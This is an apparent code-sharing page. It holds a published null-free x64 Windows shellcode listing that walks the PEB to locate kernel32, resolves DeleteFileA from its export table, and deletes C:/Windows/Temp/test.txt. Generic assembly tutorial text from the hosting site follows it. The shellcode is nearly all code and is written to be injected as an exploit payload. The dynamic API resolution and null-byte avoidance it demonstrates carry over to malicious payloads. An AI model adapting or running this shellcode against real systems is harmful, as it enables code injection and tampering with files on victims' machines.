 ; Name: Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode
; Author: Nayani
; Date: 22/04/2023
; Tested on: Microsoft Windows [Version	10.0.22621 Build 22621]


; Description: 

; This an implementation of DeleteFileA Windows api to delete a file in the C:/Windows/Temp/ directory. 
; To test this code create a file: 
; echo "test" >> C:/Windows/Temp/test.txt 
; and then execute the shellcode 
; This code uses PEB to resolve kernel32 and find the DeleteFileA function. 







sub rsp, 28h
and rsp, 0fffffffffffffff0h

xor rdi, rdi            
mul rdi                 
mov r9, gs:[rax+0x60]  
mov r9, [r9+0x18]     
mov r9, [r9+0x20]     
mov r9, [r9]          
mov r9, [r9]          
mov r9, [r9+0x20]     
mov r8, r9             

; Get kernel32.dll ExportTable Address
mov r9d, [r9+0x3C]     
add r9, r8             
xor rcx, rcx            
add cx, 0x88ff
shr rcx, 0x8            
mov edx, [r9+rcx]      
add rdx, r8             

; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C]    
add r10, r8             

; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20]    
add r11, r8             

; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24]    
add r12, r8             

jmp short name_api


getaddr:
pop r9                
pop rcx                 
xor rax, rax            
mov rdx, rsp             
push rcx                
check_loop:
mov rcx, [rsp]          
xor rdi,rdi             
mov edi, [r11+rax*4]    
add rdi, r8             
mov rsi, rdx            
repe cmpsb              
je resolver           
incloop:
inc rax
jmp short check_loop


resolver:
pop rcx                 
mov ax, [r12+rax*2]    
mov eax, [r10+rax*4]   
add rax, r8            
push r9               
ret                    

name_api:                   

; DeleteFileA

xor rcx, rcx
add cl, 0xC                 
mov rax, 0x41656CFFFFFFFFFF		;leA
shr rax, 40
push rax
mov rax, 0x69466574656C6544		;DeleteFi
push rax
push rcx                    
call getaddr             
mov r14, rax                

; Bool DeleteFileA(
;   LPCSTR lpFileName
; );

xor rcx, rcx
mul rcx                     
push rax                    

mov rax, 0x7478742E74736574
push rax
mov rax, 0x2F706D65542F7377 ; ws/temp 
push rax
mov rax, 0x6F646E69572F3A43 ; c:/Windo
push rax                    ; RSP = "test.txt"
mov rcx, rsp                ; RCX = "test.txt"
sub rsp, 0x20               
call r14                    ;Delete File in C:/Windows/Temp/test.txt 
add rsp, 0x20

created 2 years ago

Assembly Online Compiler

Write, Run & Share Assembly code online using OneCompiler's Assembly online compiler for free. It's one of the robust, feature-rich online compilers for Assembly language. Getting started with the OneCompiler's Assembly compiler is simple and pretty fast. The editor shows sample boilerplate code when you choose language as Assembly and start coding.

About Assembly

Assembly language(asm) is a low-level programming language, where the language instructions will be more similar to machine code instructions.

Every assembler may have it's own assembly language designed for a specific computers or an operating system.

Assembly language requires less execution time and memory. It is more helful for direct hardware manipulation, real-time critical applications. It is used in device drivers, low-level embedded systems etc.

Syntax help

Assembly language usually consists of three sections,

Data section

To initialize variables and constants, buffer size these values doesn't change at runtime.
bss section

To declare variables
text section

_start specifies the starting of this section where the actually code is written.

Variables

There are various define directives to allocate space for variables for both initialized and uninitialized data.

1. To allocate storage space to Initialized data

Syntax

variable-name    define-directive    initial-value

Define Directive	Description	Allocated Space
DB	Define Byte	1 byte
DW	Define Word	2 bytes
DD	Define Doubleword	4 bytes
DQ	Define Quadword	8 bytes
DT	Define Ten Bytes	10 bytes

2. To allocate storage space to un-initialized data

Define Directive	Description
RESB	Reserve a Byte
RESW	Reserve a Word
RESD	Reserve a Doubleword
RESQ	Reserve a Quadword
REST	Reserve a Ten Bytes

Constants

Constants can be defined using

1. equ

To define numeric constants

CONSTANT_NAME EQU regular-exp or value

2. %assign

To define numeric constants.

%assign constant_name value

3. %define

To define numeric or string constants.

%define constant_name value

Loops

Loops are used to iterate a set of statements for a specific number of times.

mov ECX,n
L1:
;<loop body>
loop L1

where n specifies the no of times loops should iterate.

Procedures

Procedure is a sub-routine which contains set of statements. Usually procedures are written when multiple calls are required to same set of statements which increases re-usuability and modularity.

procedure_name:
   ;procedure body
   ret